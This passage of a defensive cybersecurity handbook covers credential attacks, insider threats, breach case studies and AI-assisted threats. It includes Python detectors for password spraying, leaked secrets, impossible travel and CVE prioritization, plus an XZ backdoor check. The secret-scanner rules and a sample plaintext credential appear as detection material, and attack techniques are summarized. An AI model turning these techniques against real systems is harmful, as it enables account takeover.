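        if not spec:
            findings.append((name, "unpinned (no version specifier)"))
        elif not spec.startswith("=="):
            findings.append((name, "range specifier, not a pin: " + spec))
        elif "*" in spec:
            findings.append((name, "wildcard pin: " + spec))
        hashes = HASH_RE.findall(line)  # list of (alg, hexdigest)
        if require_hashes and not hashes:
            findings.append((name, "no --hash, integrity not verified"))
        for alg, hexdigest in hashes:
            if len(hexdigest) != DIGEST_LEN[alg]:
                findings.append((name, "malformed %s hash" % alg))
    return findings


if __name__ == "__main__":
    for pkg, issue in lint_requirements(SAMPLE_REQUIREMENTS):
        print("%-14s %s" % (pkg, issue))
```

Wire it into CI so a non-empty result fails the build; together with `pip install --require-hashes`, that turns "pin and verify" from advice into a gate. The same idea applies to lockfiles in other ecosystems (`package-lock.json`, `go.sum`), which carry integrity hashes of their own.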
09

Credential Attacks

// YOUR PASSWORDS ARE THE MASTER KEY

Credentials are the single most targeted asset in cyberattacks. Stolen or weak credentials were involved in 81% of breaches (Verizon DBIR 2024). Attackers don't "hack in" — they log in. With 16 billion leaked credentials circulating on dark web markets in 2025, credential-based attacks are at an all-time high.

Password Attacks
  • Brute force: Try every possible combination (automated, fast)
  • Dictionary attack: Try common words and known passwords
  • Password spraying: Try one common password against many accounts (evades lockout)
  • Credential stuffing: Use breached username/password combos from other sites
  • Rainbow tables: Pre-computed hash tables to reverse unsalted hashes
In-Memory Credential Theft
  • Mimikatz: Dumps plaintext passwords from Windows LSASS memory
  • Pass-the-Hash (PtH): Use captured NTLM hash without cracking
  • Pass-the-Ticket (PtT): Use stolen Kerberos tickets
  • Kerberoasting: Request service tickets and crack them offline
  • DCSync: Pretend to be a DC and replicate all password hashes
Check if you're already breached: Use haveibeenpwned.com to check if your email/domain appears in known data breaches. The HaveIBeenPwned API can be integrated into your HR offboarding and new-hire processes to flag compromised passwords on day 1.
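Password spraying is listed above as evading lockout, which is exactly why per-account failure counters miss it: the signal is one source touching many accounts, each only a few times. The following added Python example (not from the handbook) shows detection logic that keys on the source instead. It keeps a sliding window of failed logins per source IP, classifies a source as a spray when it has failed against many distinct users while staying under the lockout threshold for each, classifies it as brute force when it hammers a single account, and records any successful login from a source already flagged, which is the event worth paging on. The log lines are constructed in a simple key=value format that stands in for your IdP's real export.

```python
import re
from collections import Counter, defaultdict, deque
from datetime import datetime, timezone

# Constructed IdP-style authentication events, one per line (not a real product's format).
SAMPLE_AUTH_LOG = """\
2025-06-01T10:00:00Z src=192.0.2.10 user=alice result=FAIL
2025-06-01T10:00:05Z src=192.0.2.10 user=alice result=OK
2025-06-01T10:01:00Z src=198.51.100.7 user=alice result=FAIL
2025-06-01T10:01:10Z src=198.51.100.7 user=bob result=FAIL
2025-06-01T10:01:20Z src=198.51.100.7 user=carol result=FAIL
2025-06-01T10:01:30Z src=198.51.100.7 user=dave result=FAIL
2025-06-01T10:01:40Z src=198.51.100.7 user=erin result=FAIL
2025-06-01T10:01:50Z src=198.51.100.7 user=frank result=OK
""" + "".join("2025-06-01T10:02:%02dZ src=203.0.113.5 user=admin result=FAIL\n" % s
              for s in range(0, 60, 5))  # twelve failures against one account

EVENT_RE = re.compile(r"^(?P<ts>\S+) src=(?P<src>\S+) user=(?P<user>\S+) result=(?P<result>OK|FAIL)$")


def parse_events(text: str) -> list:
    """Return (unix_ts, src, user, result) tuples sorted by time; unparseable lines are skipped."""
    events = []
    for line in text.splitlines():
        m = EVENT_RE.match(line.strip())
        if not m:
            continue
        ts = datetime.strptime(m["ts"], "%Y-%m-%dT%H:%M:%SZ").replace(tzinfo=timezone.utc).timestamp()
        events.append((ts, m["src"], m["user"], m["result"]))
    return sorted(events)


def classify_sources(events: list, window_s: int = 600, spray_min_users: int = 5,
                     lockout_threshold: int = 5, brute_min_attempts: int = 10) -> dict:
    """Map source IP -> verdict. Only failures feed the window; successes after an alert are kept."""
    recent = defaultdict(deque)  # src -> deque of (ts, user) failures inside the window
    verdicts = {}
    for ts, src, user, result in events:
        if result == "OK":
            if src in verdicts:
                verdicts[src]["success_after_alert"].append(user)  # likely account compromise
            continue
        dq = recent[src]
        dq.append((ts, user))
        while ts - dq[0][0] > window_s:
            dq.popleft()
        if src in verdicts:
            continue  # already flagged; keep the first verdict
        per_user = Counter(u for _, u in dq)
        if len(per_user) >= spray_min_users and max(per_user.values()) < lockout_threshold:
            verdicts[src] = {"verdict": "password_spray", "users_tried": len(per_user),
                             "success_after_alert": []}
        elif len(per_user) == 1 and sum(per_user.values()) >= brute_min_attempts:
            verdicts[src] = {"verdict": "brute_force", "users_tried": 1,
                             "success_after_alert": []}
    return verdicts


if __name__ == "__main__":
    for src, info in classify_sources(parse_events(SAMPLE_AUTH_LOG)).items():
        print(src, info)
```

In the constructed data, 198.51.100.7 is flagged as a spray after its fifth distinct user and its later success against `frank` is recorded, 203.0.113.5 is flagged as brute force on its tenth failure against `admin`, and 192.0.2.10 (one typo, then success) is not flagged at all. Real sprays are often spread across many source addresses, so in production the same window is also worth keying on user-agent or ASN.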
10

Insider Threats

// THE ENEMY WITHIN

Insider threats come from people who already have authorized access — employees, contractors, partners. They are the hardest to detect because their initial access is legitimate. Insider threats cost 3× more on average than external breaches ($15.38M per incident, Ponemon 2022).

Malicious Insider

Intentionally steals data, sabotages systems, or sells access. Often motivated by financial gain, grudge, or recruitment by competitors/foreign actors.

Example: Coupang breach (Dec 2025) — former employee suspected of selling 33.7M customer records.

Negligent Insider

Causes breaches through carelessness — clicking phishing links, misconfiguring S3 buckets, using weak passwords, sharing credentials. Not malicious, but costly.

Example: Samsung employees pasting source code into ChatGPT in 2023, leaking confidential code.

Compromised Insider

Legitimate account taken over by an external attacker via phishing, credential theft, or malware. Attacker operates under the victim's identity and privileges.

Most common: Phished VPN credentials → attacker logs in as employee → accesses internal systems.

11

Case Study: Uber (2022)

// SOCIAL ENGINEERING + MFA FATIGUE = FULL COMPROMISE

The 2022 Uber breach is a masterclass in social engineering combined with MFA fatigue. A teenager-level attacker with no zero-days achieved full admin access to Uber's internal systems in hours, demonstrating that technical controls mean nothing if human factors are ignored.

Step 1. Initial Compromise: Credential Purchase on Dark Web
Attacker purchased an Uber contractor's credentials from a dark web marketplace. Credential stuffing from previous breaches enabled access to contractor's personal accounts.
Step 2. MFA Bypass: MFA Fatigue Attack
Attacker attempted login triggering MFA push notifications. When contractor repeatedly rejected, attacker sent a WhatsApp message claiming to be "Uber IT Support" and instructed the contractor to approve the push. After persistent attempts, the contractor approved. This is MFA fatigue/push bombing.
Step 3. Lateral Movement: Finding Hardcoded Credentials
Once inside the contractor's VPN, attacker found a network share containing PowerShell scripts. These scripts had hardcoded admin credentials for Uber's Thycotic PAM system (privileged access manager). This is the cardinal sin of secrets management.
Step 4. Full Compromise: Admin Access to Everything
With PAM admin access, the attacker accessed: AWS, GCP, Google Workspace, GitHub, HackerOne bug reports (including unpatched vulns), internal Slack, SentinelOne EDR console, and Uber's financial data. Posted to Uber's internal Slack: "I am a hacker and Uber has suffered a data breach."
Failures: What Went Wrong
  • Simple push MFA — vulnerable to fatigue attacks
  • Admin credentials in plaintext on network share
  • VPN access = too much lateral movement possible
  • Contractor had access far beyond their role
  • No detection of credential-stuffing login attempts
Lessons: Prevention
  • Mandate FIDO2/Passkeys for all employees (phishing-resistant)
  • Enable number matching on push MFA as minimum
  • Never store credentials in code, scripts, or shared drives
  • Use ZTNA — per-app access, not broad VPN access
  • Quarterly access reviews — remove excessive privileges
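"Never store credentials in code, scripts, or shared drives" is enforceable: a scan of the share in step 3 would have found the PAM credentials before the attacker did. The following added Python example (not from the handbook, and not the tool Uber uses) is a minimal secret scanner of that kind. It runs three rules over a script: keyword assignments such as `password = "..."`, the PowerShell `ConvertTo-SecureString "..." -AsPlainText` idiom that puts a plaintext secret on the command line, and AWS access key IDs by their `AKIA` prefix, while skipping obvious placeholders so the report is not noise. The sample script and every value in it are constructed for the demo (the access key is the example key from AWS's own documentation), and findings are reported redacted so the scanner's own output does not become a second copy of the secret.

```python
import re

# Constructed PowerShell script modelled on the page's description of the Uber share.
# Every value here is made up for the demo; the AKIA key is AWS's documented example key.
SAMPLE_SCRIPT = """\
$PamUser = "svc-pam-admin"
$PamPassword = "Sup3rS3cret!2022"
$secure = ConvertTo-SecureString "Sup3rS3cret!2022" -AsPlainText -Force
$cred = New-Object System.Management.Automation.PSCredential($PamUser, $secure)
$env:AWS_ACCESS_KEY_ID = "AKIAIOSFODNN7EXAMPLE"
$apiKey = "<YOUR_API_KEY>"
$token = $env:API_TOKEN
$ok = Read-Host "Password" -AsSecureString
"""

# (rule name, regex). The LAST capture group of each regex is the candidate secret value.
RULES = [
    ("secret-assignment",
     re.compile(r"(?i)(password|passwd|pwd|secret|token|api[_-]?key)\s*[=:]\s*[\"']([^\"']{6,})[\"']")),
    ("powershell-plaintext-securestring",
     re.compile(r"(?i)ConvertTo-SecureString\s+[\"']([^\"']+)[\"'].*-AsPlainText")),
    ("aws-access-key-id",
     re.compile(r"\b(AKIA[0-9A-Z]{16})\b")),
]

# Values that are clearly not live secrets: <PLACEHOLDER>, CHANGEME, $variables, {{templates}}.
PLACEHOLDER_RE = re.compile(r"^<.*>$|CHANGE_?ME|^\$|^\{\{")


def redact(value: str) -> str:
    """Keep a short prefix so a finding can be matched to a file, never the whole value."""
    return value[:3] + "*" * (len(value) - 3)


def scan_text(text: str) -> list:
    """Return (line_number, rule_name, redacted_value) for every hit that is not a placeholder."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        for rule, rx in RULES:
            m = rx.search(line)
            if not m:
                continue
            value = m.group(m.lastindex)
            if PLACEHOLDER_RE.search(value):
                continue
            findings.append((lineno, rule, redact(value)))
    return findings


if __name__ == "__main__":
    for lineno, rule, shown in scan_text(SAMPLE_SCRIPT):
        print("line %d: %s (%s)" % (lineno, rule, shown))
```

On the constructed script this reports lines 2, 3 and 5; the `$apiKey` placeholder, the `$env:` reference and the `Read-Host -AsSecureString` prompt (which is the correct way to take a password in PowerShell) are left alone. Run the same scanner as a pre-commit hook and over file shares on a schedule, and treat each hit as a credential to rotate, not just a line to delete.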
12

Case Study: XZ Utils Backdoor (2024)

// CVE-2024-3094 — THE MOST SOPHISTICATED OSS ATTACK EVER

The XZ Utils backdoor (CVE-2024-3094, CVSS 10.0) is arguably the most sophisticated software supply chain attack ever discovered. A threat actor (believed to be state-sponsored) spent over two years slowly building trust in the XZ open-source project, then inserted a backdoor that would have given them remote code execution on millions of Linux systems via OpenSSH.

What made it extraordinary: The attacker (username "Jia Tan") didn't just write code — they built a social identity over 2+ years, contributed legitimate improvements, manipulated the original maintainer through psychological pressure, gained trust from the community, and finally inserted the backdoor hidden in a binary test file. It was caught only because a Microsoft engineer noticed SSH was 500ms slower than expected.
2021: "Jia Tan" Begins Contributing
A new contributor appears on the XZ mailing list. Makes small, legitimate bug fixes. Builds reputation slowly. Other sock-puppet accounts created to pressure the original maintainer (Lasse Collin) about "slow development pace."
2022–2023: Trust Building & Pressure Campaign
Jia Tan takes over more responsibilities. Fake community members pressure Lasse to hand over more control, claiming he is "burned out." Lasse eventually grants Jia Tan commit access. A long-game social engineering campaign against a single open-source maintainer.
Feb 2024: Backdoor Inserted (v5.6.0 & 5.6.1)
Malicious code hidden in binary test files (not in readable source). During build process, a script extracts and injects code that modifies the liblzma library. This library is used by systemd, which is linked to OpenSSH on Debian/Fedora systems. The backdoor allows anyone with a specific private key to authenticate and execute code via SSH — before authentication.
March 29, 2024: Discovered by Andres Freund (Microsoft)
Andres noticed SSH logins were 500ms slower than expected on his Debian unstable system. This small performance anomaly led him down a rabbit hole that uncovered the backdoor. He disclosed to the Openwall mailing list. Patches shipped within hours. It was caught just before reaching stable distributions — had it shipped in Ubuntu LTS, millions of systems would have been backdoored.
Detection — Check if your system was affected
```bash
# Check XZ version (vulnerable: 5.6.0 or 5.6.1)
xz --version

# Binary detection via hexdump signature
path="$(ldd "$(which sshd)" | grep liblzma | grep -o '/[^ ]*')"
if hexdump -ve '1/1 "%.2x"' "$path" | grep -q f30f1efa554889f54c89ce5389fb81e7000000804883ec28488954241848894c2410; then
  echo "VULNERABLE — backdoored liblzma detected!"
else
  echo "Not vulnerable"
fi

# Remediation: downgrade to < 5.6.0
sudo apt install xz-utils=5.4.4-1   # Debian/Ubuntu
sudo dnf downgrade xz               # Fedora/RHEL
```
13

Case Study: Scattered Spider 2025

// SOCIAL ENGINEERING HITS UK RETAIL

Scattered Spider (also known as UNC3944 or Octo Tempest) is a threat group known for aggressive social engineering. In Easter 2025, they compromised Marks & Spencer, the Co-op, and Harrods in a coordinated campaign — causing over £300M in business impact for M&S alone and weeks of online retail disruption.

Attack Method (Social Engineering)
  • Called IT helpdesk impersonating employees
  • Used personal information found on LinkedIn/social media to answer security questions
  • Convinced helpdesk to reset MFA on accounts
  • Gained access to identity provider (Okta/Azure AD)
  • From IdP — accessed everything: email, files, internal systems
  • Deployed ransomware after establishing persistence
Impact (Massive)
  • M&S: Online shopping disabled for 3+ weeks
  • Estimated £300M+ lost revenue for M&S
  • Co-op: Data stolen on 6.5 million members
  • Harrods: Systems disrupted during sale period
  • DragonForce ransomware deployed
  • No technical zero-days used — pure social engineering
Key Lesson: Scattered Spider never needed to break through a firewall or exploit a vulnerability. They called a phone number and talked their way in. Your helpdesk is a critical security control. Implement identity verification for all helpdesk interactions — a shared secret, a hardware security key, or a video call with manager. Never reset MFA based on a phone call alone.
14

Case Study: ByBit Crypto Heist (2025)

// LAZARUS GROUP — $1.5 BILLION STOLEN

In February 2025, North Korea's Lazarus Group stole approximately $1.5 billion in Ethereum from ByBit exchange — the largest cryptocurrency theft in history. The attack exploited a vulnerability in a third-party wallet software provider, demonstrating the devastating reach of supply chain attacks into the financial sector.

Attack Vector (Supply Chain)

Lazarus compromised Safe (a multisig wallet software provider used by ByBit). They injected malicious JavaScript into Safe's signing interface. When ByBit's signers approved what appeared to be a legitimate transaction, the malicious code in the UI altered the destination address to Lazarus-controlled wallets.

The signers saw a legitimate transaction. The blockchain received a different one.

Scale & Laundering (Nation-State)
  • $1.5 billion Ethereum — largest crypto theft ever
  • Funds laundered through 5+ mixing services
  • Split into 50+ wallets within hours
  • Converted through decentralized exchanges (DEX)
  • Used to fund North Korea's weapons program
  • Lazarus attributed by FBI, Elliptic, and blockchain analytics
North Korea's Lazarus Group is responsible for over $3 billion in crypto theft since 2017. These funds directly finance the North Korean regime and its nuclear weapons program. This is state-sponsored cybercrime with geopolitical consequences — no "bug bounty" will bring these funds back. The ByBit attack shows that even air-gapped hardware wallets can be bypassed if the signing interface itself is compromised.
15

AI as the Attacker's Biggest Tool

// HOW GENERATIVE AI SUPERCHARGES ATTACKS
AI Threat Intelligence

Generative AI has fundamentally changed the economics and scale of cyberattacks. Tasks that previously required skilled, experienced attackers can now be automated, personalized at scale, and executed by anyone with a subscription. AI is not creating new attack categories — it is making existing attacks faster, cheaper, more convincing, and more accessible.

AI-Powered Attack Techniques

Hyper-Personalized Phishing (Scaled)

LLMs analyze LinkedIn, Twitter, company websites, and GitHub to generate highly personalized spear-phishing emails. Previously required hours per target; now: seconds per thousand targets. Quality dramatically higher than template-based phishing.

Example: AI-crafted email referencing your actual recent project, manager's name, and company's upcoming conference. Near-impossible to distinguish from legitimate email.

Deepfake Voice & Video [Emerging]

Voice cloning from 3-second audio samples. Video deepfakes of executives "approving" wire transfers. In 2024, a Hong Kong firm lost $25M when a finance employee was tricked by a deepfake video call impersonating the CFO. Vishing attacks powered by real-time voice cloning.

Tools: ElevenLabs, HeyGen, Synthesia (legitimate tools misused).

AI-Assisted Malware Development

AI helps write polymorphic malware that changes its signature to evade AV. Automates vulnerability discovery in open-source code. Generates exploit code from CVE descriptions. Translates attack techniques between programming languages. Debugs malware when it fails.

Reality: WormGPT and other uncensored LLMs specifically designed for cybercrime are sold on dark web forums.

Automated Vulnerability Discovery

AI models trained on CVEs, exploit databases, and source code can identify vulnerability patterns at scale. Google DeepMind's Project Zero uses AI for vuln research — and so do APT groups. AI can analyze millions of lines of code for injection points, logic flaws, and crypto weaknesses faster than human researchers.

Real-World AI Attack Scenarios (2024–2025)
# 1. CAMPAIGN SCALE
# Old: 1 analyst crafts 50 phishing emails/day
# New: AI pipeline generates 50,000 personalized emails/hour
# Each references victim's employer, role, recent news, colleagues

# 2. DEEPFAKE BEC (Business Email Compromise)
# Attacker → clones CFO voice from YouTube earnings call
# Calls finance team: "Emergency wire transfer, I'm in a meeting, do it now"
# Real incident: $25M lost at Hong Kong firm (2024)

# 3. AI RECONNAISSANCE
# AI agent browses target company's:
# - Job postings (reveals tech stack: "Must know AWS Lambda, Terraform, Okta")
# - GitHub (reveals code patterns, leaked secrets)
# - LinkedIn (org chart, employee movements)
# - Shodan (exposed services)
# Generates full attack plan in minutes

# 4. AUTOMATED EXPLOIT GENERATION
# CVE published → AI reads description → generates working PoC exploit
# Time from CVE publish to exploit: previously days/weeks, now: hours
# This is why patch SLAs have compressed dramatically
16

AI in Defense

// FIGHTING FIRE WITH FIRE

The same capabilities that power AI attacks are being deployed defensively. AI enables defenders to process telemetry at machine scale, detect anomalies that humans would miss in the noise, automate response, and identify vulnerabilities before attackers do.

Anomaly Detection at Scale [High Value]

ML models baseline "normal" behavior (user login times, data access patterns, network flows) and flag deviations. Detect: impossible travel, credential stuffing, data staging, lateral movement — in real time across millions of events per second.

Products: Microsoft Copilot for Security, Darktrace, CrowdStrike Charlotte AI, SentinelOne Purple AI, Google SecOps.
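Two of the detections named above, impossible travel and credential stuffing, are simple enough to show end to end. The block below is an added example, not code from any of the products listed; it runs over a handful of constructed authentication events with embedded coordinates (in production the latitude and longitude would come from a GeoIP lookup on the source IP). The speed ceiling of 900 km/h and the threshold of five distinct users failing from one IP inside ten minutes are illustrative policy choices, not values from this page.

```python
import math
from collections import defaultdict
from datetime import datetime, timedelta

MAX_PLAUSIBLE_KMH = 900.0                # assumption: roughly airliner speed
STUFFING_WINDOW = timedelta(minutes=10)  # assumption
STUFFING_MIN_USERS = 5                   # assumption

# Constructed sample events: (time, user, src_ip, outcome, lat, lon).
# Coordinates are embedded so the example runs offline.
EVENTS = [
    ("2025-01-10T09:00:00Z", "alice", "203.0.113.10", "success", 40.71, -74.01),  # New York
    ("2025-01-10T09:30:00Z", "alice", "198.51.100.7", "success", 1.35, 103.82),   # Singapore
    ("2025-01-10T09:05:00Z", "bob",   "203.0.113.20", "success", 51.51, -0.13),   # London
    ("2025-01-10T12:05:00Z", "bob",   "203.0.113.21", "success", 48.86, 2.35),    # Paris
] + [
    # six different accounts failing from one IP within five minutes
    (f"2025-01-10T09:1{i}:00Z", f"user{i}", "192.0.2.55", "failure", 37.77, -122.42)
    for i in range(6)
]


def parse_ts(ts: str) -> datetime:
    return datetime.fromisoformat(ts.replace("Z", "+00:00"))


def haversine_km(lat1, lon1, lat2, lon2) -> float:
    """Great-circle distance between two points in kilometres."""
    r = 6371.0
    p1, p2 = math.radians(lat1), math.radians(lat2)
    dphi = p2 - p1
    dlam = math.radians(lon2 - lon1)
    a = math.sin(dphi / 2) ** 2 + math.cos(p1) * math.cos(p2) * math.sin(dlam / 2) ** 2
    return 2 * r * math.asin(math.sqrt(a))


def impossible_travel(events):
    """Flag consecutive successful logins per user that imply an implausible speed."""
    by_user = defaultdict(list)
    for ts, user, ip, outcome, lat, lon in events:
        if outcome == "success":
            by_user[user].append((parse_ts(ts), ip, lat, lon))
    alerts = []
    for user, logins in by_user.items():
        logins.sort()
        for (t1, ip1, la1, lo1), (t2, ip2, la2, lo2) in zip(logins, logins[1:]):
            km = haversine_km(la1, lo1, la2, lo2)
            hours = (t2 - t1).total_seconds() / 3600
            # zero elapsed time with a non-zero distance is treated as infinite speed
            speed = km / hours if hours > 0 else (math.inf if km > 0 else 0.0)
            if speed > MAX_PLAUSIBLE_KMH:
                alerts.append({"user": user, "from_ip": ip1, "to_ip": ip2,
                               "km": round(km), "kmh": round(speed)})
    return alerts


def credential_stuffing(events):
    """Flag a source IP whose failures span many distinct accounts in a short window."""
    by_ip = defaultdict(list)
    for ts, user, ip, outcome, *_ in events:
        if outcome == "failure":
            by_ip[ip].append((parse_ts(ts), user))
    alerts = []
    for ip, fails in by_ip.items():
        fails.sort()
        for i, (start, _) in enumerate(fails):          # sliding window over failures
            users = {u for t, u in fails[i:] if t - start <= STUFFING_WINDOW}
            if len(users) >= STUFFING_MIN_USERS:
                alerts.append({"src_ip": ip, "distinct_users": len(users),
                               "window_start": start.isoformat()})
                break
    return alerts


if __name__ == "__main__":
    for a in impossible_travel(EVENTS) + credential_stuffing(EVENTS):
        print(a)
```

On the sample data alice's New York to Singapore hop (about 15,000 km in 30 minutes) is flagged while bob's London to Paris trip three hours later is not, and 192.0.2.55 is flagged for six distinct accounts failing inside the window. A production version keys the same logic off a streaming SIEM query rather than a list, but the two detections are exactly these comparisons.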

AI-Assisted Threat Hunting [Emerging]

Security analysts query their SIEM in natural language: "Show me all users who accessed sensitive data from a new IP in the last 7 days and had a failed MFA attempt first." AI translates to complex KQL/SPL, runs the query, and summarizes findings.

Shrinks required expertise: Tier-1 analysts can run Tier-3 investigations.

Automated Vulnerability Research

Google's Project Zero uses AI to find vulnerabilities in OSS at scale. OSS-Fuzz with ML guidance discovers memory-safety bugs. AI code review tools (Snyk DeepCode, GitHub Advanced Security) catch security flaws in PRs before merge.

In 2024: Google's Big Sleep AI agent discovered a stack buffer underflow in SQLite — before any human.

SOAR with LLM Integration

Security Orchestration, Automation, and Response (SOAR) platforms now use LLMs to generate incident summaries, suggest next steps, draft remediation runbooks, and even write correlation rules from natural language descriptions. Reduces analyst mean-time-to-respond.

AI arms race reality: AI improves both offense and defense asymmetrically. Attackers benefit more from AI automation (scripting, scaling campaigns). Defenders benefit more from AI analysis (detecting patterns in massive telemetry). Net result: the quality bar for both attacks and defenses rises. Organizations that don't adopt AI-assisted detection will fall further behind.
17

Defender's Toolkit

// TOOLS EVERY SECURITY ENGINEER SHOULD KNOW

The security tooling landscape is vast. Below is a curated set organized by function — covering what attackers use to probe your systems, and what defenders use to protect, detect, and respond.

Red Team / Offensive (Know Your Enemy's Tools)

| Tool | Purpose | Use Case |
|---|---|---|
| nmap | Network scanner | Port scanning, service enumeration, OS detection |
| Burp Suite | Web app proxy | Intercept, modify HTTP traffic; find web vulns |
| Metasploit | Exploit framework | Run exploits, generate payloads, post-exploitation |
| Mimikatz | Windows credential dumper | Extract NTLM hashes, Kerberos tickets from memory |
| BloodHound | AD attack path visualizer | Find shortest path to Domain Admin in Active Directory |
| Impacket | Python network protocols | SMB relay, Kerberoasting, DCSync, secretsdump |
| Shodan | Internet-facing asset search | Discover exposed services before attackers do |
| Evilginx3 | AiTM phishing framework | Bypass MFA via reverse proxy phishing |
| SQLmap | SQL injection automation | Detect and exploit SQL injection vulnerabilities |
| Nikto | Web server scanner | Find server misconfigurations and known vulns |

Blue Team / Defensive

| Tool | Category | What It Does |
|---|---|---|
| Wireshark | Network Analysis | Deep packet inspection, protocol analysis, traffic forensics |
| Sysmon | Endpoint Telemetry | Windows process creation, network, registry events for SIEM |
| Zeek | Network Monitor | Protocol analysis, IDS, connection logging, threat hunting |
| Snort / Suricata | IDS/IPS | Signature-based intrusion detection and prevention |
| YARA | Malware Detection | Pattern-match rules to identify malware families |
| Velociraptor | DFIR | Remote forensics, endpoint monitoring, rapid IR collection |
| Trivy | Container/Code Scanning | CVE scanning for containers, IaC, code repositories |
| gitleaks | Secrets Detection | Scan git history and staged files for leaked secrets |
| Semgrep | SAST | Static analysis to find security bugs in code |
| CyberChef | Data Analysis | Encode/decode, analyze, transform data — "the analyst's Swiss Army knife" |
| MISP | Threat Intel | Share and consume threat intelligence (IOCs, TTPs) |
| TheHive | IR Platform | Collaborative incident response case management |
18

Live CVE & Threat Intelligence

// REAL-TIME VULNERABILITY & ATTACK FEEDS

Staying current on vulnerabilities and threat intelligence is a daily discipline. Attackers exploit new CVEs within hours of publication. Subscribe to these feeds and configure automated alerts for your asset types.

CVE Severity Reference

| Severity | CVSS Range | Patch SLA | Example |
|---|---|---|---|
| CRITICAL | 9.0 – 10.0 | 24 hours — isolate if can't patch | CVE-2024-3094 (XZ, 10.0), Log4Shell (10.0) |
| HIGH | 7.0 – 8.9 | 7 days | CVE-2023-44487 (HTTP/2 Rapid Reset, 7.5) |
| MEDIUM | 4.0 – 6.9 | 30 days | Typical XSS, auth bypass in internal tools |
| LOW | 0.1 – 3.9 | 90 days | Information disclosure, hardening recommendations |
CVSS ≠ Priority. A CVSS 9.8 on an internal system no attacker can reach may matter less than a CVSS 6.5 on your public-facing login API. Combine CVSS with EPSS (probability of exploitation) and CISA KEV (confirmed exploited in wild) for true risk prioritization. EPSS 0.85 + CISA KEV = patch today, regardless of CVSS.
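The severity bands and SLAs above, plus the EPSS/KEV rule of thumb, can be turned into a small prioritization function. The block below is an added example, not a tool from this page; the CVSS bands and SLA hours come from the table, the 0.85 EPSS cut-off from the rule just stated, and the one-level promotion for internet-facing assets and demotion for unreachable ones is an illustrative policy choice. The sample findings use obviously placeholder CVE identifiers and constructed EPSS values.

```python
from dataclasses import dataclass

# Severity bands and patch SLAs from the CVE Severity Reference table (hours).
SLA_HOURS = {"CRITICAL": 24, "HIGH": 7 * 24, "MEDIUM": 30 * 24, "LOW": 90 * 24}
LEVELS = ["CRITICAL", "HIGH", "MEDIUM", "LOW"]   # index 0 is most urgent
EPSS_PATCH_TODAY = 0.85                           # rule of thumb from this page


@dataclass(frozen=True)
class Finding:
    cve: str
    cvss: float
    epss: float           # probability of exploitation in the next 30 days, 0..1
    in_kev: bool          # listed in CISA Known Exploited Vulnerabilities
    internet_facing: bool # reachable by an external attacker
    asset: str


def cvss_band(score: float) -> str:
    """Map a CVSS base score onto the table's severity bands."""
    if score >= 9.0:
        return "CRITICAL"
    if score >= 7.0:
        return "HIGH"
    if score >= 4.0:
        return "MEDIUM"
    return "LOW"   # 0.1-3.9; a 0.0 ("None") score is folded into LOW here


def shift(level: str, steps: int) -> str:
    """Move a level up (negative steps) or down (positive steps), clamped to the list."""
    i = min(max(LEVELS.index(level) + steps, 0), len(LEVELS) - 1)
    return LEVELS[i]


def prioritize(f: Finding) -> tuple[str, int, str]:
    """Return (effective level, SLA in hours, human-readable reasoning)."""
    level = cvss_band(f.cvss)
    reasons = [f"CVSS {f.cvss} -> {level}"]
    if f.in_kev or f.epss >= EPSS_PATCH_TODAY:
        # Confirmed or highly likely exploitation overrides CVSS entirely.
        level = "CRITICAL"
        reasons.append("KEV-listed or EPSS >= 0.85: patch today")
    elif f.internet_facing:
        level = shift(level, -1)   # assumption: exposure promotes one level
        reasons.append("internet-facing: +1 level")
    else:
        level = shift(level, +1)   # assumption: unreachable demotes one level
        reasons.append("not reachable from the internet: -1 level")
    return level, SLA_HOURS[level], "; ".join(reasons)


def patch_order(findings) -> list[str]:
    """Order CVEs by effective level, then by exploitation probability."""
    ranked = sorted(findings, key=lambda f: (LEVELS.index(prioritize(f)[0]), -f.epss))
    return [f.cve for f in ranked]


# Constructed sample findings reproducing the scenario in the text.
SAMPLE_FINDINGS = [
    Finding("CVE-EXAMPLE-A", 9.8, 0.02, False, False, "internal batch host, no ingress"),
    Finding("CVE-EXAMPLE-B", 6.5, 0.40, False, True,  "public-facing login API"),
    Finding("CVE-EXAMPLE-C", 5.3, 0.91, True,  True,  "public web server"),
]

if __name__ == "__main__":
    for f in SAMPLE_FINDINGS:
        level, sla, why = prioritize(f)
        print(f"{f.cve}: {level} within {sla}h ({why})")
    print("patch order:", patch_order(SAMPLE_FINDINGS))
```

On the sample data the CVSS 9.8 internal finding and the CVSS 6.5 public login API both land on HIGH, and the public one ranks first on EPSS, while the CVSS 5.3 finding that is KEV-listed with EPSS 0.91 jumps straight to the 24-hour SLA: the ordering the text argues for, with the reasoning recorded alongside each decision so it can be audited.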
19

Learning Resources

// YOUR SECURITY EDUCATION ROADMAP

Security is a field where continuous learning is not optional — it is the job. Attackers innovate constantly. Here are the highest-quality resources to build and maintain expertise, from absolute beginner to threat intelligence analyst.

Hands-On Labs & Practice

Standards & Frameworks

Reading & News

Recommended Learning Path: (1) Start with PortSwigger Web Security Academy — free, comprehensive, practical. (2) Practice on TryHackMe beginner paths. (3) Read Verizon DBIR annually — it tells you what's actually happening in the real world. (4) Follow @SwiftOnSecurity, @hacks4pancakes, and @thegrugq on social media for daily threat intelligence. (5) When ready, pursue OSCP (offensive) or GCIA/GCIH (defensive) certifications.